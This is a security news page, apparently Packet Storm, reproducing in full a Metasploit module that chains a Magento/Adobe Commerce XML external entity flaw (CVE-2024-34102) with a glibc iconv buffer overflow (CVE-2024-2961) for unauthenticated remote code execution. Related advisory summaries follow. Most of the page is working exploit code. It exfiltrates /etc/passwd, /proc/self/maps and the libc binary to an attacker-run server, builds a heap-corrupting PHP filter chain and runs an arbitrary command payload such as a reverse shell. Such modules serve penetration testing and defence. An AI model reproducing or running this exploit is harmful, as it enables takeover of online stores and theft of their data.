Security
Headlines
HeadlinesLatestCVEs

Headline

Magento / Adobe Commerce Remote Code Execution

This Metasploit module uses a combination of an arbitrary file read (CVE-2024-34102) and a buffer overflow in glibc (CVE-2024-2961). It allows for unauthenticated remote code execution on various versions of Magento and Adobe Commerce (and earlier versions if the PHP and glibc versions are also vulnerable). Versions affected include 2.4.7 and earlier, 2.4.6-p5 and earlier, 2.4.5-p7 and earlier, and 2.4.4-p8 and earlier.

Packet Storm
#vulnerability#web#linux#debian#apache#js#git#php#rce#buffer_overflow#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Retry  prepend Msf::Exploit::Remote::AutoCheck  require 'elftools'  class ProcSelfMapsError < StandardError; end  PAD = 20  HEAP_SIZE = 2 * 1024 * 1024  BUG = '劄'  def initialize(info = {})    super(      update_info(        info,        'Name' => 'CosmicSting: Magento Arbitrary File Read (CVE-2024-34102) + PHP Buffer Overflow in the iconv() function of glibc (CVE-2024-2961)',        'Description' => %q{          This combination of an Arbitrary File Read (CVE-2024-34102) and a Buffer Overflow in glibc (CVE-2024-2961)          allows for unauthenticated Remote Code Execution on the following versions of Magento and Adobe Commerce and          earlier if the PHP and glibc versions are also vulnerable:          - 2.4.7 and earlier          - 2.4.6-p5 and earlier          - 2.4.5-p7 and earlier          - 2.4.4-p8 and earlier          Vulnerable PHP versions:          - From PHP 7.0.0 (2015) to 8.3.7 (2024)          Vulnerable iconv() function in the GNU C Library:          - 2.39 and earlier          The exploit chain is quite interesting and for more detailed information check out the references. The tl;dr being:          CVE-2024-34102 is an XML External Entity vulnerability leveraging  PHP filters to read arbitrary files from the target          system. The exploit chain uses this to read /proc/self/maps, providing the address of PHP's heap and the libc's filename.          The libc is then downloaded, and the offsets of libc_malloc, libc_system and libc_realloc are extracted, and made use          of later in the chain.          With this information and expert knowledge of PHP's heap (chunks, free lists, buckets, bucket brigades), CVE-2024-2961          can be exploited. A long chain of PHP filters is constructed and sent in the same way the XXE is exploited, building a          payload in memory and using the buffer overflow to execute it, resulting in an unauthenticated RCE.        },        'Author' => [          'Sergey Temnikov', # CVE-2024-34102 Discovery          'Charles Fol',     # CVE-2024-2961 Discovery + RCE PoC          'Heyder',          # module for CVE-2024-34102          'jheysel-r7'       # module        ],        'References' => [          [ 'URL', 'https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md'],          [ 'URL', 'https://sansec.io/research/cosmicsting'],          [ 'URL', 'https://www.ambionics.io/blog/iconv-cve-2024-2961-p1'],          [ 'URL', 'https://github.com/ambionics/cnext-exploits/blob/main/cosmicsting-cnext-exploit.py'], # PoC this module is based on          [ 'CVE', '2024-2961'],          [ 'CVE', '2024-34102']        ],        'License' => MSF_LICENSE,        'Platform' => %w[linux unix],        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Unix Command',            {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd              # Tested with cmd/linux/http/x64/meterpreter_reverse_tcp            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-07-26', # The date the PoC for this exploit was made public        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'The base path to the web application', '/']),        OptInt.new('DOWNLOAD_FILE_TIMEOUT', [ true, 'The amount of time to wait for the XXE to return the file requested', 10]),      ]    )  end  def check_magento    etc_password = download_file('/etc/passwd')    vprint_status('Attempting to download /etc/passwd')    if etc_password.nil?      CheckCode::Safe('Unable to download /etc/passwd via the Arbitrary File Read (CVE-2024-34102).')    else      CheckCode::Vulnerable('Exploit precondition 1/3 met: Downloading /etc/passwd via the Arbitrary File Read (CVE-2024-34102) was successful.')    end  end  def check_php_rce_requirements    text = Rex::Text.rand_text_alpha(50)    base64 = Rex::Text.encode_base64(text)    path1 = "data:text/plain;base64,#{base64}"    result1 = download_file(path1)    if result1 == text      vprint_good('The data wrapper is working')    else      return CheckCode::Safe('The data:// wrapper does not work')    end    text = Rex::Text.rand_text_alpha(50)    base64 = Rex::Text.encode_base64(text)    path2 = "php://filter//resource=data:text/plain;base64,#{base64}"    result2 = download_file(path2)    if result2 == text      vprint_good('The filter wrapper is working')    else      return CheckCode::Safe('The php://filter/ wrapper does not work')    end    text = Rex::Text.rand_text_alpha(50)    compressed_text = compress(text)    base64 = Base64.encode64(compressed_text).gsub("\n", '')    path = "php://filter/zlib.inflate/resource=data:text/plain;base64,#{base64}"    result3 = download_file(path)    if result3 == text      vprint_good('The zlib extension is enabled')    else      CheckCode::Safe('The zlib extension is not enabled')    end    CheckCode::Appears('Exploit precondition 2/3 met: PHP appears to be exploitable.')  end  def check_libc_version    begin      @libc_binary = get_libc    rescue ProcSelfMapsError => e      return CheckCode::Unknown("There was an issue processing /proc/self/maps which is required to extract the libc version: #{e.class}: #{e}")    end    return CheckCode::Unknown('Unable to download the glibc binary from the target which is required to exploit. Rerunning the module could fix this issue.') unless @libc_binary    # A string similar to the following should appear in the binary: "GNU C Library (Debian GLIBC 2.36-9+deb12u4) stable release version 2.36."    printable_strings = @libc_binary.scan(/[[:print:]]{20,}/).map(&:strip)    libc_version = nil    printable_strings.each do |string|      if string =~ /GNU\s+C\s+Library.*version\s+(\d\.\d+)/        libc_version = Rex::Version.new(Regexp.last_match(1))        break      end    end    CheckCode::Unknown('Unable to determine the version of libc') unless libc_version    if libc_version > Rex::Version.new('2.39')      CheckCode::Safe("glibc version is not vulnerable: #{libc_version}")    end    CheckCode::Appears("Exploit precondition 3/3 met: glibc is version: #{libc_version}")  end  def check    setup_module    print_status('module setup')    magento_checkcode = check_magento    return magento_checkcode unless magento_checkcode.code == 'vulnerable'    print_good(magento_checkcode.reason)    php_checkcode = check_php_rce_requirements    return php_checkcode unless php_checkcode.code == 'appears'    print_good(php_checkcode.reason)    libc_version_checkcode = check_libc_version    return libc_version_checkcode unless libc_version_checkcode.code == 'appears'    print_good(libc_version_checkcode.reason)    CheckCode::Appears  end  def download_file(file)    @filter_path = "php://filter/convert.base64-encode/convert.base64-encode/resource=#{file}"    @target_file = file    @file_data = nil    send_path(@filter_path)    retry_until_truthy(timeout: datastore['DOWNLOAD_FILE_TIMEOUT']) do      break if @file_data    end    @file_data  end  def send_path(path)    @filter_path = Rex::Text.encode_base64(path)    vprint_status('Sending XXE request')    vprint_status("Filter path being sent: #{@filter_path}")    system_entity = Rex::Text.rand_text_alpha_lower(4..8)    xml = "<?xml version='1.0' ?>"    xml += "<!DOCTYPE #{Rex::Text.rand_text_alpha_lower(4..8)}"    xml += '['    xml += "  <!ELEMENT #{Rex::Text.rand_text_alpha_lower(4..8)} ANY >"    xml += "    <!ENTITY % #{system_entity} SYSTEM \"http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@url_file}/#{@filter_path}\"> %#{system_entity}; %#{@xxe_param};  "    xml += ']'    xml += "> <r>&#{@xxe_exfil};</r>"    json = {      address: {        totalsReader: {          collectorList: {            totalCollector: {              sourceData: {                data: xml,                options: 524290              }            }          }        }      }    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{Rex::Text.rand_text_alpha(32)}/estimate-shipping-methods"),      'ctype' => 'application/json',      'data' => JSON.generate(json)    })    res  end  def find_main_heap(regions)    # Any anonymous RW region with a size greater than the base heap size is a candidate.    # The heap is at the bottom of the region.    heaps = regions.reverse.each_with_object([]) do |region, arr|      next unless region[:permissions] == 'rw-p' &&                  region[:stop] - region[:start] >= HEAP_SIZE &&                  (region[:stop] & (HEAP_SIZE - 1)).zero? &&                  ['', '[anon:zend_alloc]'].include?(region[:path])      arr << (region[:stop] - HEAP_SIZE + 0x40)    end    if heaps.empty?      raise ProcSelfMapsError, "Unable to find PHP's main heap in memory by parsing /proc/self/maps"    end    first = heaps[0]    if heaps.size > 1      heap_addresses = heaps.map { |heap| "0x#{heap.to_s(16)}" }.join(', ')      vprint_status("Potential heaps: [i]#{heap_addresses}[/] (using first)")    else      vprint_status("Using [i]0x#{first.to_s(16)}[/] as heap")    end    vprint_good('Successfully extracted the location in memory of the PHP heap')    first  end  def get_libc_region(regions, *names)    libc_region = regions.find do |region|      names.any? { |name| region[:path].include?(name) }    end    unless libc_region      raise ProcSelfMapsError, 'Unable to locate libc region in /proc/self/maps'    end    vprint_good("Successfully located the libc region in memory: #{libc_region}")    libc_region  end  def get_libc    @regions ||= get_regions    @info['heaps'] = find_main_heap(@regions)    @libc_region ||= get_libc_region(@regions, 'libc-', 'libc.so')    download_file(@libc_region[:path])  end  def get_symbols_and_addresses    begin      @libc_binary ||= get_libc    rescue ProcSelfMapsError => e      fail_with(Failure::UnexpectedReply, "There was an issue processing /proc/self/maps which is required to extract the libc version: #{e.class}: #{e}")    end    fail_with(Failure::UnexpectedReply, 'Unable to download the glibc binary, which is required to exploit. Rerunning the module could fix this issue.') unless @libc_binary    # ELFFile expects a file, instead of writing it to disk use StringIO    libc_binary_file = StringIO.new(@libc_binary)    elf = ELFTools::ELFFile.new(libc_binary_file)    symtab_section = elf.section_by_name('.dynsym')    symbols = symtab_section.symbols    @info['__libc_malloc'] = nil    @info['__libc_system'] = nil    @info['__libc_realloc'] = nil    symbols.each do |symbol|      if ['__libc_malloc', '__libc_system', '__libc_realloc'].include? symbol.name        @info[symbol.name] = symbol.header.st_value.to_i + @libc_region[:start]      end    end    fail_with(Failure::BadConfig, 'Unable to get necessary symbols from libc.so') unless @info['__libc_malloc'] && @info['__libc_system'] && @info['__libc_realloc']    vprint_status("__libc_malloc: #{@info['__libc_malloc']}")    vprint_status("__libc_system: #{@info['__libc_system']}")    vprint_status("__libc_realloc: #{@info['__libc_realloc']}")  end  def get_regions    # Obtains the memory regions of the PHP process by querying /proc/self/maps.    maps = download_file('/proc/self/maps')    raise ProcSelfMapsError, '/proc/self/maps was unable able to be downloaded' if maps.blank?    maps = maps.force_encoding('UTF-8')    pattern = /^([a-f0-9]+)-([a-f0-9]+)\b.*\s([-rwx]{3}[ps])\s(.+)$/    regions = []    # Example lines from: /proc/self/maps    # 712eebe00000-712eec000000 rw-p 00000000 00:00 0                          [anon:zend_alloc]    # 712ef14aa000-712ef14ab000 rw-p 00007000 00:59 2144348                    /opt/bitnami/apache/modules/mod_mime.so    maps.each_line do |region|      if (match = pattern.match(region))        start_addr = match[1].to_i(16)        stop_addr = match[2].to_i(16)        permissions = match[3]        path = match[4]        if path.include?('/') || path.include?('[')          path = path.split(' ', 4).last        else          path = ''        end        current = {          start: start_addr,          stop: stop_addr,          permissions: permissions,          path: path        }        regions << current      else        raise ProcSelfMapsError, '/proc/self/maps is unparsable'      end    end    vprint_good('Successfully downloaded /proc/self/maps and parsed regions')    regions  end  def compress(data)    # Compress the data and remove the 2-byte header and 4-byte checksum    compressed_data = Zlib::Deflate.deflate(data, Zlib::BEST_COMPRESSION)    compressed_data[2..-5]  end  def compressed_bucket(data)    # Returns a chunk of size 0x8000 that, when dechunked, returns the data.    chunked_chunk(data, 0x8000)  end  def qpe(data)    # Emulates quoted-printable-encode.    data.bytes.map { |x| sprintf('=%02X', x) }.join  end  def ptr_bucket(*ptrs, size: nil)    # Raise an error if size is specified and doesn't match the expected length    if size && ptrs.length * 8 != size      fail_with(Failure::BadConfig, 'Size must match the length of pointers in ptr_bucket method')    end    bucket = ptrs.map { |ptr| p64(ptr) }.join    bucket = qpe(bucket)    bucket = chunked_chunk(bucket)    bucket = chunked_chunk(bucket)    bucket = chunked_chunk(bucket)    bucket = compressed_bucket(bucket)    bucket  end  def p64(value)    [value].pack('Q') # Pack as 64-bit little-endian  end  def chunked_chunk(data, size = nil)    if size.nil?      size = data.bytesize + 8    end    keep = data.bytesize + 2 # for "\n\n"    hex_size = data.bytesize.to_s(16)    padded_hex_size = hex_size.rjust(size - keep, '0')    "#{padded_hex_size}\n#{data}\n".b  end  def build_exploit_path    addr_free_slot = @info['heaps'] + 0x20    addr_custom_heap = @info['heaps'] + 0x0168    addr_fake_bin = addr_free_slot - 0x10    cs = 0x100    # Pad needs to stay at size 0x100 at every step    pad_size = cs - 0x18    pad = "\x00" * pad_size    3.times { pad = chunked_chunk(pad, pad.length + 6) }    pad = compressed_bucket(pad)    step1_size = 1    step1 = "\x00" * step1_size    step1 = chunked_chunk(step1)    step1 = chunked_chunk(step1)    step1 = chunked_chunk(step1, cs)    step1 = compressed_bucket(step1)    # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to    # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"    step2_size = 0x48    step2 = "\x00" * (step2_size + 8)    step2 = chunked_chunk(step2, cs)    step2 = chunked_chunk(step2)    step2 = compressed_bucket(step2)    step2_write_ptr = "0\n".ljust(step2_size, "\x00") + p64(addr_fake_bin)    step2_write_ptr = chunked_chunk(step2_write_ptr, cs)    step2_write_ptr = chunked_chunk(step2_write_ptr)    step2_write_ptr = compressed_bucket(step2_write_ptr)    step3_size = cs    step3_overflow = ("\x00" * (step3_size - BUG.bytes.length) + "\xe5\x8a\x84") # BUG bytes    step3_overflow = chunked_chunk(step3_overflow)    step3_overflow = chunked_chunk(step3_overflow)    step3_overflow = chunked_chunk(step3_overflow)    step3_overflow = compressed_bucket(step3_overflow)    step4_size = cs    step4 = '=00' + "\x00" * (step4_size - 1)    3.times { step4 = chunked_chunk(step4) }    step4 = compressed_bucket(step4)    step4_pwn = ptr_bucket(      0x200000,      0,      # free_slot      0,      0,      addr_custom_heap, # 0x18      0,      0,      0,      0,      0,      0,      0,      0,      0,      0,      0,      0,      0,      @info['heaps'], # 0x140      0,      0,      0,      0,      0,      0,      0,      0,      0,      0,      0,      0,      0,      size: cs    )    step4_custom_heap = ptr_bucket(@info['__libc_malloc'], @info['__libc_system'], @info['__libc_realloc'], size: 0x18)    step4_use_custom_heap_size = 0x140    # Fetch payloads run the payload in the background and results in multiple sessions being returned.    # If we prevent the payload from running in the background and kill the parent process after the payload completes    # running successfully we ensure only one session gets returned and improves the stability allowing the exploit to    # be run consecutively without issue.    if payload.encoded.ends_with?(' &')      command = "#{payload.encoded}& kill -9 $PPID"    else      command = "#{payload.encoded} && kill -9 $PPID"    end    command = (command + "\x00").b    command = command.ljust(step4_use_custom_heap_size, "\x00".b)    vprint_status("COMMAND: #{command}")    step4_use_custom_heap = command    step4_use_custom_heap = qpe(step4_use_custom_heap)    step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)    step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)    step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)    step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)    pages = ((step4 * 3) + step4_pwn + step4_custom_heap + step4_use_custom_heap + step3_overflow + (pad * PAD) + (step1 * 3) + step2_write_ptr + (step2 * 2))    resource = compress(compress(pages))    resource = Base64.encode64(resource.b)    resource = "data:text/plain;base64,#{resource.gsub("\n", '')}"    filters = [      # Create buckets      'zlib.inflate',      'zlib.inflate',      # Step 0: Setup heap      'dechunk',      'convert.iconv.latin1.latin1',      # Step 1: Reverse FL order      'dechunk',      'convert.iconv.latin1.latin1',      # Step 2: Put fake pointer and make FL order back to normal      'dechunk',      'convert.iconv.latin1.latin1',      # Step 3: Trigger overflow      'dechunk',      'convert.iconv.UTF-8.ISO-2022-CN-EXT',      # Step 4: Allocate at arbitrary address and change zend_mm_heap      'convert.quoted-printable-decode',      'convert.iconv.latin1.latin1',    ]    filters_string = filters.join('/')    "php://filter/#{filters_string}/resource=#{resource}"  end  def setup_module    @url_file = Rex::Text.rand_text_alpha_lower(4..8)    @url_data = Rex::Text.rand_text_alpha_lower(4..8)    @xxe_param = Rex::Text.rand_text_alpha_lower(4..8)    @xxe_exfil = Rex::Text.rand_text_alpha_lower(4..8)    @info = Hash.new    @module_setup_complete = true    if datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::'      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')    end    start_service({      'Uri' => {        'Proc' => proc do |cli, req|          on_request_uri(cli, req)        end,        'Path' => '/'      },      'ssl' => false    })    print_status('Server started')  end  def exploit    setup_module unless @module_setup_complete    fail_with(Failure::BadConfig, 'Payload is too big') if payload.encoded.length >= 0x140 # step4_use_custom_heap_size    print_status('Attempting to parse libc to extract necessary symbols and addresses')    get_symbols_and_addresses    print_status('Attempting to build an exploit PHP filter path with the information extracted from libc and /proc/self/maps')    path = build_exploit_path    print_status('Sending payload...')    send_path(path)  end  def cleanup    # Clean and stop HTTP server    if service      begin        service.remove_resource(datastore['URIPATH'])        service.deref        service.stop        self.service = nil      rescue StandardError => e        print_error("Failed to stop http server due to #{e}")      end    end    super  end  def on_request_uri(cli, req)    super    url_parts = req.uri.split('/')    case url_parts[1]    when @url_file      path = Rex::Text.decode_base64(url_parts[2])      data = Rex::Text.rand_text_alpha_lower(4..8)      response = "<!ENTITY % #{data} SYSTEM \"#{path}\"><!ENTITY % #{@xxe_param} \"<!ENTITY #{@xxe_exfil} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@url_data}/%#{data};'>\">"      send_response(cli, response)    when @url_data      @file_data = Rex::Text.decode_base64(Rex::Text.decode_base64(req.uri.sub(%r{^/#{@url_data}/}, '')))      send_response(cli, '')    else      print_bad('Server received an unexpected request.')    end  endend

Related news

Red Hat Security Advisory 2024-8235-03

Red Hat Security Advisory 2024-8235-03 - Red Hat OpenShift Container Platform release 4.14.39 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include code execution, denial of service, and out of bounds write vulnerabilities.

Red Hat Security Advisory 2024-7599-03

Red Hat Security Advisory 2024-7599-03 - Red Hat OpenShift Container Platform release 4.16.16 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include code execution, denial of service, integer overflow, and out of bounds write vulnerabilities.

Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit

Cybersecurity researchers have disclosed that 5% of all Adobe Commerce and Magento stores have been hacked by malicious actors by exploiting a security vulnerability dubbed CosmicSting. Tracked as CVE-2024-34102 (CVSS score: 9.8), the critical flaw relates to an improper restriction of XML external entity reference (XXE) vulnerability that could result in remote code execution. The shortcoming,

Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit

Cybersecurity researchers have disclosed that 5% of all Adobe Commerce and Magento stores have been hacked by malicious actors by exploiting a security vulnerability dubbed CosmicSting. Tracked as CVE-2024-34102 (CVSS score: 9.8), the critical flaw relates to an improper restriction of XML external entity reference (XXE) vulnerability that could result in remote code execution. The shortcoming,

Cisco Warns of Critical Flaw Affecting On-Prem Smart Software Manager

Cisco has released patches to address a maximum-severity security flaw impacting Smart Software Manager On-Prem (Cisco SSM On-Prem) that could enable a remote, unauthenticated attacker to change the password of any users, including those belonging to administrative users. The vulnerability, tracked as CVE-2024-20419, carries a CVSS score of 10.0. "This vulnerability is due to improper

Over 110,000 Websites Affected by Hijacked Polyfill Supply Chain Attack

Google has taken steps to block ads for e-commerce sites that use the Polyfill.io service after a Chinese company acquired the domain and modified the JavaScript library ("polyfill.js") to redirect users to malicious and scam sites. More than 110,000 sites that embed the library are impacted by the supply chain attack, Sansec said in a Tuesday report. Polyfill is a popular library that

GHSA-m8cj-3v68-3cxj: Magento Open Source affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.

Red Hat Security Advisory 2024-3464-03

Red Hat Security Advisory 2024-3464-03 - An update for glibc is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include buffer overflow, code execution, null pointer, and out of bounds write vulnerabilities.

Red Hat Security Advisory 2024-3423-03

Red Hat Security Advisory 2024-3423-03 - An update for glibc is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include buffer overflow, null pointer, and out of bounds write vulnerabilities.

Red Hat Security Advisory 2024-3339-03

Red Hat Security Advisory 2024-3339-03 - An update for glibc is now available for Red Hat Enterprise Linux 9. Issues addressed include buffer overflow, null pointer, and out of bounds write vulnerabilities.

Red Hat Security Advisory 2024-2799-03

Red Hat Security Advisory 2024-2799-03 - An update for glibc is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include buffer overflow, code execution, null pointer, and out of bounds write vulnerabilities.

Ubuntu Security Notice USN-6762-1

Ubuntu Security Notice 6762-1 - It was discovered that GNU C Library incorrectly handled netgroup requests. An attacker could possibly use this issue to cause a crash or execute arbitrary code. This issue only affected Ubuntu 14.04 LTS. It was discovered that GNU C Library might allow context-dependent attackers to cause a denial of service. This issue only affected Ubuntu 14.04 LTS. It was discovered that GNU C Library when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution. This issue only affected Ubuntu 14.04 LTS.

Ubuntu Security Notice USN-6737-2

Ubuntu Security Notice 6737-2 - USN-6737-1 fixed a vulnerability in the GNU C Library. This update provides the corresponding update for Ubuntu 24.04 LTS. Charles Fol discovered that the GNU C Library iconv feature incorrectly handled certain input sequences. An attacker could use this issue to cause the GNU C Library to crash, resulting in a denial of service, or possibly execute arbitrary code.

Debian Security Advisory 5673-1

Debian Linux Security Advisory 5673-1 - Charles Fol discovered that the iconv() function in the GNU C library is prone to a buffer overflow vulnerability when converting strings to the ISO-2022-CN-EXT character set, which may lead to denial of service (application crash) or the execution of arbitrary code.

Ubuntu Security Notice USN-6737-1

Ubuntu Security Notice 6737-1 - Charles Fol discovered that the GNU C Library iconv feature incorrectly handled certain input sequences. An attacker could use this issue to cause the GNU C Library to crash, resulting in a denial of service, or possibly execute arbitrary code.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution